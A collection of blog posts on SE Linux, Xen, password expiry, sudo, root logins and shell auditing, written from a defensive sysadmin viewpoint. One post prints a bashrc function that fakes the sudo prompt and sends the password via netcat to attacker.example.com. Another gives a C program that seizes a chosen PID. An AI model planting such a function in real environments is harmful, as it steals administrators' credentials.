Play Machine Online Again with Xen 4.0

My SE Linux Play Machine [1] has been offline for almost a month (it went offline late May 30 and has just gone online again). It’s the sort of downtime that can happen when you use Debian/Unstable.

For a while I’ve been using a HP E-PC (a SFF desktop system with 256M of RAM and a P3-800 CPU) to run my SE Linux Play Machine. I run it under Xen to make it easier for me to watch what happens. I’ve had some problems with increased memory use in the Xen Dom0 in Squeeze [2]. The latest installment of the memory problems came when I discovered that I can’t run two copies of tcpdump (for tracing separate interfaces) at once on a Xen Dom0 that has ~110M of RAM – this seems unreasonable, as I’m sure that back when a big server had 128M of RAM I could have done such things! So now I’m using a Thinkpad T20 with 512M of RAM for my new SE Linux Play Machine; it uses less power than most systems (probably even less than the HP E-PC) and is very quiet.

I was forced to install on a new system when I broke my GRUB configuration. GRUB-2 in Debian currently has no support for generating a configuration that will boot a Xen Dom0. You can manually edit the GRUB configuration to get this working, but if you get it wrong then you can make GRUB not even display a prompt and force a reinstall (as I did). As an aside it would be really handy if someone would create a CD or USB bootable image that does nothing but install GRUB. Such an image would ideally allow replacing the configuration of an existing GRUB, overwriting an existing GRUB installation (all files in /boot/grub get replaced), or formatting a spare partition (defaulting to the swap space) and installing GRUB there.

My current solution to the GRUB problems is to use the old version of GRUB in the grub-legacy package. The old version of GRUB has always done everything I want so I don’t seem to be missing anything by not using the new version. I’m happy to refrain from using Ext4 for /boot and have no desire to have /boot on an LVM volume.

Most of the month of down-time for my Play Machine was caused by bugs in the SE Linux policy I’m developing for Squeeze; while they weren’t difficult bugs, I haven’t had much time to work on them consistently. I’m still running the Play Machine on Lenny, but the Dom0 is running Unstable.

New SE Linux Policy for Squeeze

I have just uploaded refpolicy version 0.2.20100524-1 to Unstable. This policy is not well tested (a SE Linux policy package ending in “-1” is not something that tends to work well for all people) and in particular lacks testing for Desktop environments. But for servers it should work reasonably well.

I expect to have a better version uploaded before this one gets out of Unstable.

Note that the selinux-policy-default package in this release lacks support for roles, it’s a targeted policy only. I plan to fix this soon.

Can you run SE Linux on a Xen Guest?

I was asked “Can you run SELinux on a XEN guest without any problem?“. In a generic sense the answer is of course YES, Xen allows you to run Linux kernels with all the usual range of features and SE Linux isn’t a particularly difficult feature to enable. I do most of my SE Linux development and testing on virtual machines and until recently I didn’t have any hardware suitable for running KVM, so in the last few years I’ve done more SE Linux testing on Xen than on non-virtual machines. My SE Linux Play Machine [1] (which will be online again tomorrow) is one SE Linux system running under Xen.

But the question was asked in the context of my blog post comparing the prices of virtual hosting providers [2], which changes things.

Both Linode and Slicehost (the two virtual hosting providers that my clients use) provide kernels without SE Linux support, the command “grep selinux /proc/filesystems” (which is the easiest way to test for SE Linux support) gives no output. I am not aware of any other virtual hosting company that provides SE Linux support.
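
That test is easy to script if you manage many virtual servers; here is a minimal sketch (my example, not from any hosting company’s documentation):

# sketch: test whether the running kernel has SE Linux support
if grep -q selinux /proc/filesystems ; then
  echo "kernel supports SE Linux"
else
  echo "no SE Linux support in this kernel"
fi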

If anyone knows of a virtual hosting company that runs Xen or KVM virtual machines with SE Linux support then please let me know, I’ll write a blog post comparing such companies if there are some.

For the people who work at ISPs: If your company supports SE Linux virtual machines then I would be happy to review your service, just give me a free DomU for a couple of weeks so I can test it out. If your company is considering offering such virtual machines then I would be happy to have a confidential discussion about the issues that you will face, while I am available for paid consulting work in this area I am more than happy to spend an hour or two helping a company that’s going to help support my favorite free software project without expecting to be paid. But I have to note that if a dozen hosting companies happen to want advice I won’t be able to provide two hours of free advice to each of them.

I think that there is an unsatisfied market demand for SE Linux virtual machines. I don’t expect all virtual hosting companies to support it in the near future, but this will make it more profitable for those that do. If for the sake of discussion we assume that 5% of sysadmins who are making purchasing decisions regarding virtual servers really want to have SE Linux support and if 5% of virtual hosting companies were to offer such support, then those hosting companies would almost double their market share as a result of supporting SE Linux. It’s the usual economic factors relating to small companies that profit from providing good support for the needs of a minority of customers.

Should Passwords Expire?

It is widely held that passwords should be changed regularly. The Australian government declared last week to be “National Cyber Security Awareness Week” [1] and has published a list of tips for online security which includes “Get a stronger password and change it at least twice a year“.

Can a Password be Semi-Public?

Generally I think of a password as being either secret or broken. If a password is known to someone other than the sysadmin and the user who is authorised to use the account in question then you have potentially already lost all your secret data. If a password is disclosed to an unauthorised person on one occasion then merely changing the password is not going to do any good unless the root cause is addressed, otherwise another unauthorised person will probably get the password at some future time.

Hitachi has published a good document covering many issues related to password management [2]. I think it does a reasonable job of making sysadmins aware of some of the issues but there are some things I disagree with. I think it should be used as a list of issues to consider rather than a list of answers. The Hitachi document lists a number of ways that passwords may be compromised and suggests changing them every 60 to 90 days to limit the use of stolen passwords. This seems to imply that a password is something whose value slowly degrades over time as it is increasingly exposed.

I think that the right thing to do is to change a password if you suspect that it has been compromised. There’s not much benefit in having a password if it’s going to be known by unauthorised people for 89 days before being changed!

Fundamentally a password is something that can have its value rapidly drop to zero without warning. It doesn’t wear out.

Why are terms such as Three Months used for Maximum Password Ages?

The Hitachi document gives some calculations on the probability of a brute-force attack succeeding against a random password with 90 days of attacking at a rate of 100 attempts per second [2]. I think that if a service is run by someone who wouldn’t notice the load of 100 attempts per second then you have bigger security problems than the possibility of passwords being subject to brute-force attacks. Also it’s not uncommon to have policies to lock accounts after as few as three failed login attempts.
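
To put some rough numbers on it (my own arithmetic, not from the Hitachi document): 90 days at 100 attempts per second covers only a tiny fraction of the keyspace of even a modest random password, as a quick bc session shows:

# guesses made in 90 days at 100 attempts/second
echo '100 * 86400 * 90' | bc
# 777600000
# keyspace of an 8 character password over 62 characters (a-z, A-Z, 0-9)
echo '62^8' | bc
# 218340105584896
# fraction of the keyspace searched, roughly 0.00036%
echo 'scale=8; (100 * 86400 * 90) / 62^8' | bc
# .00000356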

Rumor has it that in the early days of computing when the hashed password data was world readable someone calculated that more than 3 months of CPU time on a big computer would be needed to obtain a password by brute-force. But since then the power of individual CPUs has increased dramatically, computers have become cheap enough that anyone can easily gain legal access to dozens of systems and illegal access to a million systems, and it has become a design feature in every OS that hashed passwords are not readable by general users. So the limiting factor is to what degree the server restricts the frequency of password guesses.

I don’t think that specifying the minimum password length and maximum password age based on the fraction of the key space that could be subject to a brute-force attack makes sense.

I don’t think that any attempt to make an industry-wide standard for the frequency of password changes (as the government is trying to do) makes sense.

Can there be a Delay between a Password being Compromised and being Used by an Attacker?

Hypothetically speaking, if a password was likely to be compromised (EG by having the paper it was written on lost or stored insecurely) for some time before an attacker exploited it, then changing the password during that time period could solve the problem. For example when a company moves office there is the possibility of notepaper with passwords being lost. So if the sysadmin caused every user password to expire at the time of the move then a hostile party would be unable to gain access.
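
On a typical Linux system such a bulk expiry could be done with chage; a minimal sketch, assuming regular accounts have UIDs of 1000 or more:

# force a password change at the next login for every regular user
awk -F: '$3 >= 1000 && $3 != 65534 {print $1}' /etc/passwd |
while read user ; do
  chage -d 0 "$user"
done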

Another possibility is the theft of backup tapes that contain the list of unencrypted passwords. If users change their passwords every three months then the theft of some four month old backup tapes will be less of a problem.

Another possibility concerns the resale of old computers, phones, and other devices that may contain passwords. A reasonably intelligent user won’t sell their old hardware as soon as the replacement device arrives, they will want to use the new device for some time to ensure that it works correctly. If passwords expire during this trial period with the new device then passwords stored in the old device won’t have any value. The down-side to this idea is that people probably sell their old gear fairly quickly and making passwords expire every two weeks would not be accepted well by the users.

It seems to me that having bulk password changes (all passwords for one user or for one company) based on circumstances that lead to potential insecurity would do more good than changing passwords at a fixed schedule.

How are Passwords typically Compromised?

Dinei Florêncio and Cormac Herley of Microsoft Research and Baris Coskun of Brooklyn Polytechnic University wrote a paper titled “Do Strong Web Passwords Accomplish Anything?” [3] which discusses this issue. The first thing that they note is that nowadays passwords are most commonly compromised by phishing and keylogging. In those cases passwords are typically used shortly after they are stolen and the strength of a password never does any good. That paper suggests that banks should use stronger user-names rather than stronger passwords to combat the threat of bulk brute-force attacks.

Can a Password Last Forever?

If a password is entered in a secure manner, authenticated by a secure server, and all network links are encrypted or physically protected then there should never be a need to change it.

Of course nothing is perfectly secure, so for some things with minimal short-term value or which can be used without anyone noticing there is a benefit in changing the password. But in the case of Internet banking if a hostile party gets your login details then you will probably know about it in a few days when the bank calls you about the unusual transactions from foreign countries – long before a 90 day password change schedule would have done any good.

Maybe one of the issues determining whether a password should be changed regularly is whether an attacker could use long-term read-only access to gain some benefit. Being able to read all the email someone received for a year could be a significant benefit if that person was a public figure, and there’s usually no way for an ISP customer to know that someone else is downloading all their mail via POP or IMAP.

Should a Password be the only Authentication Method?

It is generally agreed that an authentication method should ideally involve something you have plus something you know. That means a password and a physical device such as a smart card, token with a changing sequential password, or a key such as a Yubikey [4]. If the physical device can’t be cloned (through some combination of technical difficulty and physical access control) then it significantly improves security. When a physical device is used the purpose of the password is merely to stop someone who steals the physical device from being able to immediately exploit everything – the password only has to be strong enough to keep the accounts secure until a new token can be issued.

The combination of something you have and something you know is very strong. Having a physical token stored on the desk next to the PC that is used for logging in provides a significant benefit: an attacker then needs to break in to the house and can’t sniff the password by compromising the PC remotely.

Conclusion

In all aspects of security you need to consider what threats you face. If an attacker is likely to launch an immediate noisy attack (such as transferring the maximum funds out of an Internet banking account) then changing the password regularly won’t do any good. If a subtle long-term attack is expected then changing the password can do a lot of good – but a physical token is the ideal if the account is valuable enough.

But to put things into perspective, it’s technically possible to use a mobile phone camera at close range (or a SLR with a big lens at long range) to take a photo of keys that allows them to be reproduced. But this hasn’t stopped people from carrying their house keys in an obvious manner that permits photography or leaving them on their desk at work. Also I’ve never heard of anyone routinely changing the door locks in case a hostile party might have got a key – although I’m sure that such practices are common in highly secure locations. Few people even take their house keys off the key-ring when they have their car serviced!

Related Posts

Defense in Depth and Sudo – when using sudo can increase security and when it can’t.
Logging Shell Commands – how to log what the sysadmin does and what benefits that provides you; it doesn’t help if the sysadmin is hostile.
Logging in as Root – should you login directly as root?

Defense in Depth and Sudo

My blog post about logging in as root and whether sudo provides any benefit [1] got some interest on Reddit. In the Reddit comments on my post [2] there are a lot of strange things. One interesting comment was to suggest that logging in as non-root provided “defense in depth”.

The NSA is credited with inventing the term “Defense in Depth” as applied to the computer industry, and they have a PDF that gives an overview of the concept [3]. It seems that Defense in Depth is all about having multiple different layers of security: firewalls, IDS/IPS, passwords, PKI, etc. Entering the same password twice (once to login and once to run sudo – which seems to be a fairly typical configuration of sudo) hardly seems to count.

Can using sudo provide Defense in Depth benefits?

With a typical configuration the use of sudo provides no real protection. The user either enters their own password or the root password to gain full root access, in either case the attacker can exploit their session and get the password. A session exploit can be easily arranged by creating a shell function or alias that makes sudo run something else (such as using netcat to send the password out over the network).
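
To illustrate how little work such an attack takes, here is a sketch of a hostile function of the type described, as it might be appended to a victim’s ~/.bashrc (attacker.example.com is a placeholder, and the prompt text would be matched to the local configuration):

sudo() {
  # imitate the normal sudo password prompt
  read -r -s -p "[sudo] password for $USER: " PW
  echo
  # leak the password to the attacker
  echo "$PW" | nc attacker.example.com 1234
  # run the real sudo so the victim notices nothing
  echo "$PW" | command sudo -S "$@"
}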

One way of making this sort of attack more difficult is to make root own the user home directory, files such as ~/.login that are used by the user shell, the ~/.ssh directory and the ~/.ssh/authorized_keys file. This way a hostile party can’t change the configuration, so a successful attack has to involve a long running process that uses ptrace to intercept the shell and divert an attempt to run sudo.
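
A sketch of that lockdown for a hypothetical user john (the exact list of files depends on which shell and login methods are in use):

# make root own the directory and the files that control the login environment
chown root:root /home/john /home/john/.bashrc /home/john/.profile
chown -R root:root /home/john/.ssh
chmod 755 /home/john
# the user can still work in a subdirectory that they own
mkdir -p /home/john/work
chown john:john /home/john/work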

If the non-root user is prevented from using ptrace then things start to become a little more difficult for the attacker. In some quick tests I was able to capture about half the data through messing with /proc/X/fd/0 and /proc/X/fd/1 for a target process, but it seems that it would be difficult to get an entire password that way. To disable ptrace you could compile a kernel without ptrace support, use a SE Linux policy that prevents ptrace access for the sessions in question, or make the user’s shell SETGID.

If the root account and the account used for su or sudo use different authentication methods, where the options include ssh authorized keys, password, and security token (maybe both password and token for the root account) then it does seem that it would provide some Defense in Depth benefits.

sudo can be used to only permit executing certain commands. While this is a real security benefit it doesn’t allow full sysadmin work, merely delegating some portions of operations to people who don’t have full sysadmin rights. As someone needs to be able to fix any problem that might occur on the machine, someone needs to have access to run any command as root. So while sudo is great for providing limited administrative access to certain junior people, it’s not going to stop an attack on a member of the sysadmin team.

Conclusion

In a typical sudo configuration the non-root account is configured in a default Unix manner (with the user having ownership of their home directory). The user who logs in to that account controls its environment through .login and other scripts, so sudo doesn’t gain anything.

In a typical configuration ptrace is enabled, so even if the critical environment files can’t be modified by a hostile party they can get the same result through ptrace. Admittedly using a SETGID shell is not going to be difficult to implement after you have changed the ownership of the home directory.

If you have a configuration where ptrace is not available and the non-root user can’t modify their own profile files then it starts to become difficult for an attacker. If root authentication requires using a security token such that every login uses a different code and the code expires rapidly then it becomes even more difficult for an attacker.

But for all configurations that are close to the default for every OS that I’ve ever used none of these conditions hold. Also none of those conditions held for any of the systems I’ve been employed to use which were configured to require su or sudo for root access.

As most sudo configurations don’t provide any extra security, and auditing the actions of the sysadmin can be done better in other ways (such as the Bash 4.1 syslog feature) [4], it seems that for the vast majority of systems sudo doesn’t provide a benefit.

The fact that sudo could provide a benefit if configured in a way that is quite different to all the defaults and the ways that it is typically used is worth noting. I’m not going to argue with anyone who wants to configure their systems in such a manner and who believes that they need to do so. But anyone who thinks that sudo is the only way to go because the Ubuntu default configuration does it really needs to investigate the issues. Remember that blind faith in the security choices of other people can be a security problem.

Logging Shell Commands

In response to my previous post about logging in directly as root [1] it was suggested that using sudo is the only way to log the commands that are entered as root. One reason for doing this is if you don’t trust the people who are granted root access and you want to log all commands to a remote server that is run by different people. I wonder whether it is really possible to run systems with untrusted sysadmins; if someone can apply patches etc then they can surely install a trojan and then wait a while before activating it to make things more difficult for anyone who is analysing the logs.

One of the many issues is that even the restricted version of vim permits the :r and :w commands, so one could start vim from sudo with an innocuous file as the target of the edit operation and then read and write some critical file such as /etc/shadow. I expect that someone has written an editor which has a restricted mode that doesn’t allow reading/writing files other than the one specified on the command-line, and if not it surely wouldn’t be difficult to patch vim (or your favorite editor) to have such a mode of operation. But there are always other programs that can access files other than the ones specified on their command-line. It seems that using the auditctl interface to log access to certain critical files (EG read access to /etc/shadow and write access to everything under /etc, /bin, /sbin, and /usr) would be a necessary part of an effective auditing strategy and that sudo would only comprise a small part of a useful configuration.
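
A sketch of such rules (the keys are arbitrary names for searching the logs; -p r logs read access and -p wa logs writes and attribute changes – note that directory watches may need extra rules for complete coverage of a subtree):

# log read access to the shadow password file
auditctl -w /etc/shadow -p r -k shadow-read
# log writes and attribute changes under the system directories
auditctl -w /etc -p wa -k sys-write
auditctl -w /bin -p wa -k sys-write
auditctl -w /sbin -p wa -k sys-write
auditctl -w /usr -p wa -k sys-write
# later, search the audit log by key
ausearch -k shadow-read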

There are other viable ways of logging everything that is done as root which offer benefits over sudo.

Ways of Logging Shell Commands

The Korn shell supports doing all the logging you might desire as part of a shell function [2].

Bash can have a similar shell function to do the logging, but when a command is entered the previous command is logged [3]; this means that any single bash command that unsets this will never be logged. It might be possible to solve this if you know more about Bash than I do. I wonder if the Korn shell function has the same issue. This is still probably useful for some situations when you want to track what honorable sysadmins do, but of little benefit for tracking hostile sysadmins.
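
A sketch of the sort of Bash logging in question, using PROMPT_COMMAND (my example, with exactly the weakness described – a command that unsets PROMPT_COMMAND is never logged, because the logging for it would only run at the next prompt):

# log each command to syslog just before the next prompt is displayed
export PROMPT_COMMAND='logger -p local1.info "$(whoami)[$$]: $(history 1)"'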

You can put code in a file such as /etc/bash.bash_logout to log the commands elsewhere, but even trivial things such as “kill -9 $$” can defeat that so it’s only useful when the sysadmin is trusted.

The Sudoshell project exists to log all data that is entered in a shell [4]. One deficiency of this for the people who don’t trust the root user is that it logs the data to files on disk, but it shouldn’t be difficult to rewrite sudoscriptd to write directly to another machine over the network. One benefit of this for auditing is that it captures all the output of the commands as well (which can be a little inconvenient to decipher when curses programs are run). The web site also describes some of the problems with trying to use sudo directly for everything (such as pipelines).

If you compile Bash version 4.1 with the SYSLOG_HISTORY macro enabled (which can be done by editing the file config-top.h) then it will log all commands to syslog. RootShell.be has a short post about this which mentions the security issues: some commands take passwords as parameters and these passwords could be exposed to the network [5]. Of course the best option is to just avoid such commands. Thanks to Chris Samuel for pointing out the Bash logging feature.
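
A sketch of such a build on a Debian system (the exact comment style around the define in config-top.h may vary between versions):

apt-get source bash
cd bash-4.1
# edit config-top.h to uncomment the line:
#   #define SYSLOG_HISTORY
./configure
make
# commands entered at the resulting shell are then sent to syslog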

Conclusion

If you use sudo for auditing root access then you lose some shell functionality. Sudo also only logs the commands that are executed – you don’t get logging of output. It seems that, depending on the exact requirements, either a modified version of Sudoshell or the logging that can be compiled in to Bash would be the way to go. The main benefit of using sudo for logging would be that some distributions of Linux are configured that way by default – but it seems unlikely that someone would go to the effort of running a separate logging server that the regular sysadmin team can’t touch and then configure their servers in a default manner.

Securely Killing Processes

Joey Hess wrote on Debian-devel about the problem of init scripts not doing adequate checks before using the data from a PID file under /var/run to determine which process to kill [1]. Unfortunately that still doesn’t quite solve the problem; there is still the issue of a race condition causing a process to die while you are doing the checks and then be replaced by another process.

Below I have included the source code to a little program that will repeatedly fork() until it finds a particular PID and then have its child call sleep(). So you can run a command such as “kill -9 1234 ; ./a.out 1234” and then have this program take over the PID 1234.

From testing with this it seems that when you have a shell with its current working directory as /proc/1234 then once process 1234 is killed the current directory is empty, and “ls -l” returns 0 entries. This isn’t surprising, it’s the standard Unix behavior when the working directory is removed.

So if a program (or even a shell script) changes directory to /proc/1234 it can then verify all attributes of the process (its CWD, its root directory, the executable used to run it, its UID, GID, supplemental groups, its SE Linux context, and lots of other things) all atomically. The only possibility for confusion is that a process might execute a SETUID or SETGID program or a program that has a label which triggers a SE Linux domain transition. It might also change some attributes without executing a new process, for example by using the setuid(), setgid(), setgroups(), or other similar system calls. For the purposes of killing a process I don’t think that the possibility of it changing its own attributes or executing a new program are serious problems; if you want to kill a process then you probably want to kill it after it has called setuid() etc.
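
A sketch of such a check from a shell; if process 1234 dies while we sit in the directory then these files simply disappear, so the checks can’t match a recycled PID:

cd /proc/1234 || exit 1
readlink exe            # the executable used to run it
readlink cwd            # the current working directory
readlink root           # the root directory
grep -E '^(Uid|Gid|Groups):' status
cat attr/current        # the SE Linux context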

It seems to me that it would be useful to have a file named /proc/PID/signal (or something similar) to which you could write a number and then have the kernel send the signal in question to that process. So the commands “kill -9 1234” and “echo 9 > /proc/1234/signal” would give the same result. But you could run the command “cd /proc/1234” and then some time later you could run “echo 9 > signal” and know that you would kill the original process 1234 if it was still running and not some other process that replaced it.

What do you think? Is this worthy of adding a new feature to the proc filesystem?

The Source

Run the following program with a single parameter which is the PID that you want it to take. It will keep looping through the PID space until it gets the one you specify, if the one you specify isn’t available (EG you give it “1” as a parameter) then it will run forever. It will take some time to get a result on a slower system. On my P3-900MHz test system it took up to 72 seconds to get a result.

#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/wait.h>

int main(int argc, char **argv)
{
  if(argc != 2)
  {
    fprintf(stderr, "Specify the desired PID on the command-line\n");
    return 1;
  }
  pid_t wanted = (pid_t)atoi(argv[1]);
  int rc;
  int status;

  /* Keep forking until a child is assigned the wanted PID.  Each
   * unwanted child falls out of the loop (fork() returns 0 in the
   * child), does nothing, and exits; the parent reaps it and tries
   * again, cycling through the PID space. */
  while((rc = fork()) != wanted && rc != 0)
  {
    if(rc == -1)
    {
      fprintf(stderr, "fork error\n");
      return 1;
    }
    if(wait(&status) == -1)
      fprintf(stderr, "wait error\n");
  }
  if(rc == 0)
  {
    /* In the child: if we got the wanted PID then hold on to it. */
    if(getpid() == wanted)
    {
      printf("Got pid %d, sleeping\n", (int)wanted);
      sleep(200);
    }
    return 0;
  }
  /* In the parent: reap the child that got the wanted PID. */
  wait(&status);
  return 0;
}

Can SE Linux Implement Traditional Unix Users and Groups?

I was asked by email whether SE Linux could implement traditional Unix users and groups.

The Strictly Literal Answer to that Question

The core of the SE Linux access control is the domain-type model where every process has a domain and every object that a process can access (including other processes) has a type. Domains are not strongly differentiated from types.

It would be possible to create a SE Linux policy that created a domain for every combination of UID and GID that is valid for a user shell, given that such combinations are chosen by the sysadmin, who could limit them to some degree. There are about 2^32 possible UIDs and about 2^32 possible GIDs; as every domain is listed in kernel memory we obviously can’t have 2^64 domains, but we could have enough to map a typical system that’s in use. Of course the possible combinations of supplemental groups probably make this impossible for even relatively small systems, but we can use a simpler model that doesn’t emulate supplemental groups.

For files there are more possible combinations because anyone who is a member of a group can create a SETGID directory and let other users create files in it. But in a typical system the number of groups is not much greater than the number of users – the maximum number of groups is typically the number of users plus about 60. So if we had 100 users then the number of combinations of UID and GID would be something like 100*(100+60)=16,000 – it should be possible to have that many domains in a SE Linux policy (but not desirable).

Then all that would be needed is rules specifying that each domain (which is based on a combination of UID and GID) can have certain types of access to certain other types based on them having either the same UID or the same GID.

Such a policy would be large, it would waste a lot of kernel memory, it would need to be regenerated whenever a user is added, and it’s generally something you don’t want to use. No-one has considered implementing such a policy; I merely describe it to illustrate why certain configuration options are not desirable. The rest of this post is about realistic things that you can do with SE Linux policy and how it will be implemented in Debian/Squeeze.

My previous post titled “Is SE Linux Unixish?” addresses this issue at a more conceptual level and also considers MAC vs DAC [1].

The History of mapping Unix Accounts to SE Linux Access Control

In the early releases of SE Linux (long before it was included in Fedora) every user who could login to a system needed to have their user-name compiled into the policy. The policy specified which roles the user could access, the roles specified which domains could be accessed, and therefore what the user could do. The identity of files on disk was used for two purposes: one was logging (you could see who created a file) and the other was a permission check for the SE Linux patched version of Vixie cron, which would not execute any command on behalf of a user unless the identity on the crontab file in the cron spool matched the identity used to run it – this is analogous to the checks that Vixie cron makes on the Unix UID of the crontab file (some other cron daemons do fewer checks).

Having to recompile policy source every time you added a user was annoying. So a later development was to allow arbitrary mappings between Unix account names and SE Linux Identities (which included a default identity) and another later development was to have a utility program semanage to map particular Unix account and group names to SE Linux identities. This was all done years ago. Fedora Core 5 which was released in 2006 had the modular policy which included these features (apart from mapping Unix groups to SE Linux identities which was more recent).

Fedora Core 5 also introduced MCS which was comprised of a set of categories that a security context may have. The sysadmin would configure the set of categories that each account would have.

A recent development has been a concept named UBAC (User Based Access Control) which basically means that a process running directly on behalf of a regular user (IE with a SE Linux identity that’s not system_u) can only access files that have an identity of system_u or which have the same identity as the process. This means that you can only access your own files or system files – not files of other users which may have inappropriate Unix permissions. So for example if a user with a SE Linux identity of “john” gives their home directory the Unix permission mode of 0777 then a user with a SE Linux identity of “jane” can’t access their files. Of course this means that if you have a group of people working together on a project then they probably need to all have the same Identity and in practice you would probably end up with everyone having the same identity. I’ve given up on the idea of using UBAC in Debian.

The Current Plan for Users and SE Linux Access Control in Debian

My plan is to have things work in Squeeze in much the same way as in Lenny.

You have a SE Linux identity assigned to a login session and everything related to it (including cron jobs) based on the Unix account name or possibly the Unix group name (if there are login entries for both the user-name and the group-name then the user-name entry has precedence). The mapping between Unix accounts and SE Linux identities is configured by the sysadmin and SE Linux identities don’t matter much for the Targeted configuration (which is what most people use).

The identity determines which roles may be used and also has a limit on the MCS categories. The MCS categories are also specified in the login configuration which has to be a sub-set of the categories used by the identity record.

So for example the following is the output of a couple of commands run on a Debian/Unstable system. They show that the “test” Unix account is assigned a SE Linux identity of “staff_u” and an MCS range of “s0-s0:c1” (this means it creates files by default at level “s0” and can also write to other files at that level, but can also have read/write access to files at the level “s0:c1”). The “staff_u” identity (as shown in the output of “semanage user -l”) can be used with all categories in the set “s0:c0.c1023” (where the dot means the set of categories from c0 to c1023 inclusive), but in the case of the “test” user only one category will be used. The “test” group however (as expressed with “%test”) is given the identity “user_u” and is not permitted to use any categories.

# semanage login -l
Login Name    SELinux User    MLS/MCS Range            
%test         user_u          s0                       
__default__   unconfined_u    s0-s0:c0.c1023           
root          unconfined_u    s0-s0:c0.c1023           
system_u      system_u        s0-s0:c0.c1023           
test          staff_u         s0-s0:c1               

# semanage user -l
             Labeling   MLS/       MLS/                          
SELinux User Prefix     MCS Level  MCS Range         SELinux Roles
root         sysadm     s0         s0-s0:c0.c1023    staff_r sysadm_r system_r
staff_u      staff      s0         s0-s0:c0.c1023    staff_r sysadm_r
sysadm_u     sysadm     s0         s0-s0:c0.c1023    sysadm_r
system_u     user       s0         s0-s0:c0.c1023    system_r
unconfined_u unconfined s0         s0-s0:c0.c1023    system_r unconfined_r
user_u       user       s0         s0                user_r
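
For reference, mappings like the ones above can be created with commands along these lines (a sketch; -s names the SE Linux identity and -r the MCS range):

# map the Unix account "test" to the staff_u identity with category c1
semanage login -a -s staff_u -r s0-s0:c1 test
# map the Unix group "test" to the user_u identity with no categories
semanage login -a -s user_u -r s0 '%test'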

I hope to get the policy written to support multiple user roles in time for the release of Squeeze. If I don’t make it then I will put such a policy on my own web site and try to get it included in an update. The policy currently basically works for a Targeted configuration where the users are not confined (apart from MCS).

How MMCS Basically Works

The vast majority of SE Linux users run with the MCS policy rather than the MLS policy. For Debian I have written a modified version of MCS that I call MMCS. MMCS is mandatory (you can’t relabel files to escape it) and it prevents write-down.

If a process has the range s0-s0:c1,c3 then it has full access to files labelled as s0, s0:c1, s0:c3, and s0:c1,c3 – and any files it creates will be labelled as s0.

If a process has the range s0:c1-s0:c1,c3 then it has read-only access to files labelled as s0 and s0:c3 and read-write access to files labelled as s0:c1 and s0:c1,c3. This means that any secret data it accesses that was labelled with category c1 can’t be leaked down to a file that is not labelled with that category.
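
A quick demonstration of this (a sketch, assuming a user whose login range permits category c1):

# create a file from a shell running with category c1
runcon -l s0:c1 bash -c 'echo secret > /tmp/project1-notes'
ls -Z /tmp/project1-notes            # shows the s0:c1 label
# a process running at plain s0 is denied read access
runcon -l s0 cat /tmp/project1-notes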

Now MCS currently has no network access controls, so there’s nothing stopping a user from using scp or other network utilities to transfer files. But that’s the way with most usable systems. I don’t think that this is necessarily a problem, the almost total lack of network access controls in a traditional Unix model doesn’t seem to concern most people.

Now to REALLY Answer that Question

SE Linux is a Mandatory Access Control (MAC) system, this makes it inherently different to a Discretionary Access Control (DAC) system such as traditional Unix access controls.

Unix permissions are based on each file having a UID, a GID, and a set of permissions and each process having a UID, a GID, and a set of supplementary GIDs. If a user runs a setuid or setgid program then the process will have extra privileges. It also has a lot of stuff that most people aren’t aware of such as real vs effective UIDs, the sticky bit, setgid directories, and lots more – including some quite arbitrary things like making ports <1024 special.

SE Linux is based on every object (process, file, socket, etc) having a single security label which includes an identity, a role, a type, and a sensitivity label (MCS categories or an MLS range). There is no support for an object to have more than one label. The SE Linux equivalent to setuid/setgid files is a label for a file which triggers a domain transition when it’s executed. This differs from setuid files in that the domain transition is complete (the old privileges can’t be restored) and the transition is generally not to a strict super-set of the access (usually a different sub-set of possible access and sometimes to lesser access).

These differences are quite fundamental. So really SE Linux can’t implement traditional Unix access control. What SE Linux is designed to do is to provide a second layer of defense and to also provide access controls that have different aims than that of Unix permissions – such as being mandatory and implementing features such as MLS.

Logging in as Root

Martin Meredith wrote a blog post about logging in as root and the people who so strongly advocate against it [1]. The question is whether you should ssh directly to the root account on a remote server or whether you should ssh to a non-root account and use sudo or su to gain administrative privileges.

Does sudo/su make your system more secure?

Some years ago the administrator of a SE Linux Play Machine used the same home directory for play user logins, for administrative logins, and for his own logins – he used newrole to gain administrative access (like su or sudo but for SE Linux).

His machine was owned by one of his friends, who created a shell function named newrole in one of his login scripts that used netcat to send the administrative password out over the net. He didn’t realise that this was a problem until his friend changed the password and locked him out! This is one example of a system being 0wned due to having the double-authentication – of course if he had logged in directly with administrative privs while using the same home directory that the attacker could write to then he would still have lost, but the attacker would have had to do a little more work.

When you login you have lots of shell scripts run on your behalf which have the ability to totally control your environment; if someone has taken over those scripts then they can control everything you see, and when you think you run sudo or something they can get the password. When you ssh in to a server your security relies on the security of the client end-point, the encryption of the ssh protocol (including keeping all keys secure to prevent MITM attacks), and the integrity of all the programs that are executed before you have control of the remote system.

One benefit of using sshd to spawn a session without full privileges is in the case where you fear an exploit against sshd and are running SE Linux or some other security system that goes way beyond Unix permissions. It is possible to configure SE Linux in the “strict” configuration to deny administrative rights to any shell that is launched directly by the sshd. Therefore someone who cracks sshd could only wait until an administrator logs in and runs newrole, and they wouldn’t be able to immediately take over the system. If the sysadmin suspected that a sshd compromise was possible then they could login through some other method (maybe visit the server and login at the console) to upgrade the sshd. This is however a very unusual scenario and I suspect that most people who advocate using sudo exclusively don’t use a SE Linux strict configuration.

Does su/sudo improve auditing?

If you have multiple people with root access to one system it can be difficult to determine who did what. If you force everyone to use su or sudo then you will have a record of which Unix account was used to start the root session. Of course if multiple people start root shells via su and leave them running then it can be difficult to determine which of the people who had such shells running made the mistake – but at least that reduces the list of suspects.

If you put “PermitUserEnvironment yes” in /etc/ssh/sshd_config then you have the option of setting environment variables by ssh authorized_keys entries, so you could have an entry such as the following:

environment="ORIG_USER=john@example.com" ssh-rsa AAAAB3Nz[…]/w== john@example.com

Then you could have the .bashrc file (or a similar file for your favorite shell) have code such as the following to log the relevant data to syslogd:
if [ "$SSH_TTY" = "" ]; then
  logger -p auth.info "user $ORIG_USER ran command \"$BASH_EXECUTION_STRING\" as root"
else
  logger -p auth.info "user $ORIG_USER logged in as root on tty $(tty)"
fi

I think that forcing the use of su or sudo might improve the ability to track other sysadmins if the system is not well configured. But it seems obvious that the same level of tracking can be implemented in other ways with a small amount of effort. It took me about 30 minutes to devise the above shell code and configuration options, and it should take people who read this blog post about 5 minutes to implement it (or maybe 10 minutes if they use a different shell or have some other combination of Bash configuration that results in non-obvious use of initialisation scripts – EG if you have a .bash_profile file then .bashrc may not be executed).

